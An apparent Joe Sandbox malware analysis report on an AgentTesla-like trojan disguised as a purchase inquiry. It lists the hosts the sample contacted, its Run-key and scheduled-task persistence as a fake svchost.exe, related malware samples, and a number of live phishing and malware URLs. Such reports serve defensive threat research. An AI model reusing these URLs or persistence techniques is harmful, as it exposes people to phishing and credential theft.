http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p | InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://status.thawte.com0: | InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://smtp.zoho.eu | InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ip-api.com | InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
185.230.214.164 | smtp.zoho.eu | Netherlands | 41913 | COMPUTERLINEComputerlineSchlierbachSwitzerlandCH | false
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1437973
                                                Start date and time:2024-05-08 09:20:06 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 53s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:58
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                                                Detection:MAL
                                                Classification:mal100.spre.troj.spyw.expl.evad.winEXE@87/48@3/3
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 88%
                                                • Number of executed functions: 125
                                                • Number of non-executed functions: 3
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                • Excluded IPs from analysis (whitelisted): 20.190.190.131, 40.126.62.130, 40.126.62.132, 40.126.62.131, 20.190.190.194, 20.190.190.129, 20.190.190.195, 40.126.62.129, 20.114.59.183, 199.232.214.172, 192.229.211.108, 52.165.164.15, 20.42.65.92, 13.85.23.206, 20.189.173.20
                                                • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
08:20:55 | Task Scheduler | Run new task: svchost path: "C:\Users\user\AppData\Roaming\svchost.exe"
08:20:57 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
08:21:07 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
08:21:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vexplorers C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
08:21:29 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vexplorers C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
09:21:04 | API Interceptor | 78x Sleep call for process: powershell.exe modified
09:21:04 | API Interceptor | 317514x Sleep call for process: InstallUtil.exe modified
09:21:08 | API Interceptor | 595828x Sleep call for process: MSBuild.exe modified
09:21:15 | API Interceptor | 416978x Sleep call for process: AddInProcess32.exe modified
09:21:20 | API Interceptor | 4x Sleep call for process: WerFault.exe modified
09:21:24 | API Interceptor | 270064x Sleep call for process: jsc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | Purchase Order - PO24108267.vbs | malicious | AgentTesla, GuLoader | ip-api.com/line/?fields=hosting
208.95.112.1 | Invoice-883973938.js | malicious | WSHRAT | ip-api.com/json/
208.95.112.1 | Invoice Payment N8977823.js | malicious | WSHRAT | ip-api.com/json/
208.95.112.1 | _____PDF.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | ip-api.com/json/
208.95.112.1 | Pending_Invoice_Bank_Details_kofce_.JS.js | malicious | WSHRAT | ip-api.com/json/
208.95.112.1 | DHL Receipt_AWB 98996913276.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | DHL Shipment Notification.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | STATEMENT OF ACCOUNT DHL - 717036431.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
185.230.214.164 | INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exe | malicious | AgentTesla |
185.230.214.164 | VBG dk Payment Receipt --doc87349281.bat | malicious | Remcos, AgentTesla, DBatLoader |
104.26.13.205 | ReturnLegend.exe | malicious | Stealit | api.ipify.org/?format=json
104.26.13.205 | SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exe | malicious | PureLog Stealer, Targeted Ransomware | api.ipify.org/
104.26.13.205 | Sky-Beta-Setup.exe | malicious | Stealit | api.ipify.org/?format=json
104.26.13.205 | ArenaWarSetup.exe | malicious | Stealit | api.ipify.org/?format=json
104.26.13.205 | Sky-Beta Setup 1.0.0.exe | malicious | Unknown | api.ipify.org/?format=json
104.26.13.205 | E4sbo4F6Sz.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | E4sbo4F6Sz.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | SecuriteInfo.com.Win64.RATX-gen.31127.4101.exe | malicious | PureLog Stealer, Targeted Ransomware | api.ipify.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
fp2e7a.wpc.phicdn.net | https://u33127076.ct.sendgrid.net/ls/click?upn=u001.Dd8nu0w4qSl621Cfl5NzldfyZqjD9RWJslL2MWwt7pDZEhaAcTHbAT3eWd4fAnA0vrf6npFQIFebeFGCrAnwiA-3D-3DfmjQ_R-2Flyyz82d9aOYqi4-2FHSXVn4q8KaU22YObPyTKvaTTvltLHJTsQx6vicSpweVOt1Q2PhJWPHHTxt6yAPEzhfNUDUG5D5ilhJHkL1NI-2BWX2-2BDDI93AOg7LpunA0BU-2BZBoDgn6A5Z8xcvffpNwXtypTCusIOi-2BlO0xNH4h8I6EM-2FpelF-2BaCcmwOfdvxekMe-2FJpx-2B7DaCkmWjXbM0S7yd7UfMQ-3D-3D | malicious | Unknown | 192.229.211.108
fp2e7a.wpc.phicdn.net | https://url.us.m.mimecastprotect.com/s/NqNQClYX45S1PxGimFEoZ?domain=urldefense.proofpoint.com | malicious | HtmlDropper, HTMLPhisher | 192.229.211.108
fp2e7a.wpc.phicdn.net | https://flow.page/dnjetsdocs | malicious | Unknown | 192.229.211.108
fp2e7a.wpc.phicdn.net | https://t.email.caixabank.com/r/?id=h53014a64,6db27ee6,f3bae0f&p1=tambatourism.jp/g/c3lsdmllLnJvbGxhbmRAYXNuLmNvbQ== | malicious | Unknown | 192.229.211.108
fp2e7a.wpc.phicdn.net | https://docomo3903-tatad0c0movsnl3932.000webhostapp.com | malicious | Unknown | 192.229.211.108
fp2e7a.wpc.phicdn.net | https://app.nyheder.danskespil.dk/e/f2?elqFormName=4ChangePermission&elqSiteID=414837471&DataSourceID=706382&emailPermission=0&redirect=https://kotobukitabi.com/s/anVlcmdlbi5zZWlkbGVyQGlwcm90ZXguZGU= | malicious | Unknown | 192.229.211.108
fp2e7a.wpc.phicdn.net | https://subscription-management.paddle.com/subscription/23736269/hash/48f17787dd06251c79832319a0cd81181e25b6488ec57eb96bdbfa63d118f311/manage-subscription | malicious | Unknown | 192.229.211.108
fp2e7a.wpc.phicdn.net | http://link.csrwire.com/ls/click?upn=u001.Si0DiArC1V8ZAnBzMk9-2BdVKW245QccVJHq5a8ac9PL1cxKEohrdYzj-2Bi8X2xywdF5x014kxhAPztuH7dRixzSCWE-2BJwchVhYZ74Ivk5CnEAPFl7yJBY43wNoXEBfuRY7zCLn7IFjGzLO2VDHwzMa6b1dQgFTMqVrhr7lYKJs9qSYs-2BIWqneYUpThOMtW8ZRR6Iy8ZluudY9oUF69ErkVqA6gMOP6hsn18i6QDKKSZnC9POFmoqBrhkCOfvuGx9Sc68KnispIMnuYFYdoZ7hCy4nEg9MV1nHjooH2bSknJrw-3DJv90_uasUJFZdY7eaP30o1d8eQUWw-2Fg5FtJnmGNkAfKTWGhPhZj2SRXHcVkFycTbmteiR49Bsg0-2F8UnMQZ-2BR1nBerdNQt382IwC0Ybind3mrVDI96pH29g-2B-2FpnDj32EOLxLVmUeZ6iStdbanLNsSZ-2FO-2Fxs3A9YoRSDSCn4sC935IKMQ4t22hWlNHnvcd4gxn7IFaZE3maV8vgwBm2PtcJUiXsuRf4Iy-2B-2BJAXRBtIRgFkqBfE-3D | malicious | HTMLPhisher | 192.229.211.108
fp2e7a.wpc.phicdn.net | https://url.us.m.mimecastprotect.com/s/LOTCCXD9yEtpw99u6JYxu?domain=urldefense.proofpoint.com | malicious | HtmlDropper, HTMLPhisher | 192.229.211.108
fp2e7a.wpc.phicdn.net | https://www.qwikxf.cn/ | malicious | Unknown | 192.229.211.108
ip-api.com | QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | Purchase Order - PO24108267.vbs | malicious | AgentTesla, GuLoader | 208.95.112.1
ip-api.com | Invoice-883973938.js | malicious | WSHRAT | 208.95.112.1
ip-api.com | Invoice Payment N8977823.js | malicious | WSHRAT | 208.95.112.1
ip-api.com | _____PDF.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | 208.95.112.1
ip-api.com | Pending_Invoice_Bank_Details_kofce_.JS.js | malicious | WSHRAT | 208.95.112.1
ip-api.com | DHL Receipt_AWB 98996913276.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | DHL Shipment Notification.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | STATEMENT OF ACCOUNT DHL - 717036431.exe | malicious | AgentTesla | 208.95.112.1
api.ipify.org | SecuriteInfo.com.Trojan-Downloader.Autoit.gen.6551.1850.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
api.ipify.org | SecuriteInfo.com.Win32.TrojanX-gen.20995.10729.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
api.ipify.org | Payment Advice.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | https://seniorservice.co.za/?banner_click=true&banner_id=16535&href=http://0173316598494355.822094.actual-media.ro/de/?id=anna.pohl@bacvb.com | malicious | HTMLPhisher | 172.67.74.152
api.ipify.org | swift copy.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
api.ipify.org | Shipping Documents.pdf.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | swift copy.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
api.ipify.org | http://t.co/QwLoYDFPoZ | malicious | HTMLPhisher | 104.26.13.205
api.ipify.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.30974.7732.rtf | malicious | AgentTesla | 172.67.74.152
api.ipify.org | DHL Receipt_AWB 98996913276.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
bg.microsoft.map.fastly.net | https://u33127076.ct.sendgrid.net/ls/click?upn=u001.Dd8nu0w4qSl621Cfl5NzldfyZqjD9RWJslL2MWwt7pDZEhaAcTHbAT3eWd4fAnA0vrf6npFQIFebeFGCrAnwiA-3D-3DfmjQ_R-2Flyyz82d9aOYqi4-2FHSXVn4q8KaU22YObPyTKvaTTvltLHJTsQx6vicSpweVOt1Q2PhJWPHHTxt6yAPEzhfNUDUG5D5ilhJHkL1NI-2BWX2-2BDDI93AOg7LpunA0BU-2BZBoDgn6A5Z8xcvffpNwXtypTCusIOi-2BlO0xNH4h8I6EM-2FpelF-2BaCcmwOfdvxekMe-2FJpx-2B7DaCkmWjXbM0S7yd7UfMQ-3D-3D | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | https://url.us.m.mimecastprotect.com/s/NqNQClYX45S1PxGimFEoZ?domain=urldefense.proofpoint.com | malicious | HtmlDropper, HTMLPhisher | 199.232.210.172
bg.microsoft.map.fastly.net | https://flow.page/dnjetsdocs | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://t.email.caixabank.com/r/?id=h53014a64,6db27ee6,f3bae0f&p1=tambatourism.jp/g/c3lsdmllLnJvbGxhbmRAYXNuLmNvbQ== | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | https://docomo3903-tatad0c0movsnl3932.000webhostapp.com | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://app.nyheder.danskespil.dk/e/f2?elqFormName=4ChangePermission&elqSiteID=414837471&DataSourceID=706382&emailPermission=0&redirect=https://kotobukitabi.com/s/anVlcmdlbi5zZWlkbGVyQGlwcm90ZXguZGU= | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://subscription-management.paddle.com/subscription/23736269/hash/48f17787dd06251c79832319a0cd81181e25b6488ec57eb96bdbfa63d118f311/manage-subscription | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://url.us.m.mimecastprotect.com/s/RBIeC68AD5iQ5EOspXJld?domain=urldefense.proofpoint.com | malicious | HtmlDropper, HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | https://www.mirzbmy.cn/ | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | https://www.ruptmnc.cn/ | malicious | Unknown | 199.232.210.172
smtp.zoho.eu | INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exe | malicious | AgentTesla | 185.230.214.164
smtp.zoho.eu | VBG dk Payment Receipt --doc87349281.bat | malicious | Remcos, AgentTesla, DBatLoader | 185.230.214.164
smtp.zoho.eu | RFQ_on_SAK-TC233L-32F200N_INFINEON_PN_PHARMA.pdf.exe | malicious | AgentTesla | 89.36.170.164
smtp.zoho.eu | 1qwF1J2Njh.exe | malicious | AgentTesla | 185.230.212.164
smtp.zoho.eu | N8USBRwo0Z.exe | malicious | AgentTesla | 89.36.170.164
smtp.zoho.eu | PURCHASE_ORDER.exe | malicious | AgentTesla, zgRAT | 89.36.170.164
smtp.zoho.eu | New Enquiry List.exe | malicious | AgentTesla | 185.20.209.164
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSSecuriteInfo.com.Trojan-Downloader.Autoit.gen.6551.1850.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.12.205
                                                    y4UgZYdag6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 172.67.185.34
                                                    https://u33127076.ct.sendgrid.net/ls/click?upn=u001.Dd8nu0w4qSl621Cfl5NzldfyZqjD9RWJslL2MWwt7pDZEhaAcTHbAT3eWd4fAnA0vrf6npFQIFebeFGCrAnwiA-3D-3DfmjQ_R-2Flyyz82d9aOYqi4-2FHSXVn4q8KaU22YObPyTKvaTTvltLHJTsQx6vicSpweVOt1Q2PhJWPHHTxt6yAPEzhfNUDUG5D5ilhJHkL1NI-2BWX2-2BDDI93AOg7LpunA0BU-2BZBoDgn6A5Z8xcvffpNwXtypTCusIOi-2BlO0xNH4h8I6EM-2FpelF-2BaCcmwOfdvxekMe-2FJpx-2B7DaCkmWjXbM0S7yd7UfMQ-3D-3DGet hashmaliciousUnknownBrowse
                                                    • 162.159.61.3
                                                    https://url.us.m.mimecastprotect.com/s/NqNQClYX45S1PxGimFEoZ?domain=urldefense.proofpoint.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                    • 104.17.2.184
                                                    http://rheodata.comGet hashmaliciousUnknownBrowse
                                                    • 172.67.185.53
                                                    https://flow.page/dnjetsdocsGet hashmaliciousUnknownBrowse
                                                    • 104.18.125.91
                                                    POX17265XSCB.xlsxGet hashmaliciousUnknownBrowse
                                                    • 172.67.215.45
                                                    https://docomo3903-tatad0c0movsnl3932.000webhostapp.comGet hashmaliciousUnknownBrowse
                                                    • 104.18.11.207
                                                    https://subscription-management.paddle.com/subscription/23736269/hash/48f17787dd06251c79832319a0cd81181e25b6488ec57eb96bdbfa63d118f311/manage-subscriptionGet hashmaliciousUnknownBrowse
                                                    • 104.18.125.91
                                                    SecuriteInfo.com.Win32.TrojanX-gen.20995.10729.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.13.205
                                                    COMPUTERLINEComputerlineSchlierbachSwitzerlandCHINQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 185.230.214.164
                                                    https://classic.dreamclass.io/pages/admissions/form/BvtxckGet hashmaliciousUnknownBrowse
                                                    • 185.230.212.28
                                                    http://www.multipli.com.auGet hashmaliciousUnknownBrowse
                                                    • 185.230.212.28
                                                    https://workdrive.zohoexternal.com/external/2c63de0fdd4c89e3b1929ff054753df29586989db597aec11b0424839e9707da/downloadGet hashmaliciousUnknownBrowse
                                                    • 185.230.212.52
                                                    https://survey.zohopublic.eu/zs/GzDXvpGet hashmaliciousHTMLPhisherBrowse
                                                    • 185.230.212.19
                                                    https://site24x7.comGet hashmaliciousUnknownBrowse
                                                    • 185.230.212.11
                                                    https://workdrive.zoho.eu/file/17s6p7fb7d86e6c7d46b790f74da739ebdd8dGet hashmaliciousUnknownBrowse
                                                    • 185.230.212.52
                                                    EGpGxFlJO8.exeGet hashmaliciousGlupteba, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                    • 89.36.170.166
                                                    VBG dk Payment Receipt --doc87349281.batGet hashmaliciousRemcos, AgentTesla, DBatLoaderBrowse
                                                    • 185.230.214.164
                                                    https://mailer2.zohoinsights.eu/ck1/13ef.4aba358de/4652e940-cb13-11ee-af3c-525400b65433/894286b67613768b29c78076a31443d9fd7b902a/2?e=aMgNxARpVMrEefJgEKI5XWhw45Pz00VPkB6DgwAaNtbVO/bgaxrbvc49ksOMhPHJgbhA1KvMxdaWrLLDEbkMfIm9dE7WxdYmk3Lc%20xD0COY=Get hashmaliciousUnknownBrowse
                                                    • 185.230.212.184
                                                    TUT-ASUSQUOTATION_MAYQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 208.95.112.1
                                                    Purchase Order - PO24108267.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 208.95.112.1
                                                    Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                                                    • 208.95.112.1
                                                    Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                    • 208.95.112.1
                                                    _____PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                    • 208.95.112.1
                                                    Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                                    • 208.95.112.1
                                                    DHL Receipt_AWB 98996913276.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 208.95.112.1
                                                    DHL Shipment Notification.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 208.95.112.1
                                                    STATEMENT OF ACCOUNT DHL - 717036431.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Trojan-Downloader.Autoit.gen.6551.1850.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.13.205
                                                    https://flow.page/dnjetsdocsGet hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    SecuriteInfo.com.Win32.TrojanX-gen.20995.10729.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.13.205
                                                    Payment Advice.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    retroactive_effective_date_agreement.jsGet hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    JGomKnothX.exeGet hashmaliciousQuasarBrowse
                                                    • 104.26.13.205
                                                    retroactive_effective_date_agreement.jsGet hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    retroactive effective date agreement 96285.jsGet hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    https://uww-reg.ru/tarjetaliderbci/superavance-nlpk/Get hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    retroactive effective date agreement 96285.jsGet hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exePO454323 Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                        090998948.vbsGet hashmaliciousXWormBrowse
                                                          SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exeGet hashmaliciousAgentTeslaBrowse
                                                            FEDEX & INVOICE.Tracking Details.exeGet hashmaliciousAgentTeslaBrowse
                                                              63762524.vbsGet hashmaliciousXWormBrowse
                                                                48727365.vbsGet hashmaliciousXWormBrowse
                                                                  329182736.vbsGet hashmaliciousXWormBrowse
                                                                    payment pdf.exeGet hashmaliciousAgentTesla, DarkTortilla, PureLog Stealer, RedLineBrowse
                                                                      FAC- IST9G4VW.exeGet hashmaliciousAgentTeslaBrowse
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.1675750929285134
                                                                        Encrypted:false
                                                                        SSDEEP:192:573RUnoSA5i0Vf7yGUhaWTO8LxQmIDzuiFZZ24lO83:NRUnoSYVf7y5haiO8BuzuiFZY4lO83
                                                                        MD5:B3C164B94D1EC66103971AE455C1DD6A
                                                                        SHA1:DEEED16BDA9227AF0CD3C6A748A678AB3C093A52
                                                                        SHA-256:524C691EF289F44F93A7C61F564C63788B719A7B1DC03E5481023CBF6D7C20AF
                                                                        SHA-512:65B1630E3C23CA462CC78297C7D3A4A3506D2A807253D5A498AD5B4588D6F91CCB9D34CCF5D781DAD16BEC579393874063CFFE0108BCE769CEC0C3D36A1AEAB1
                                                                        Malicious:false
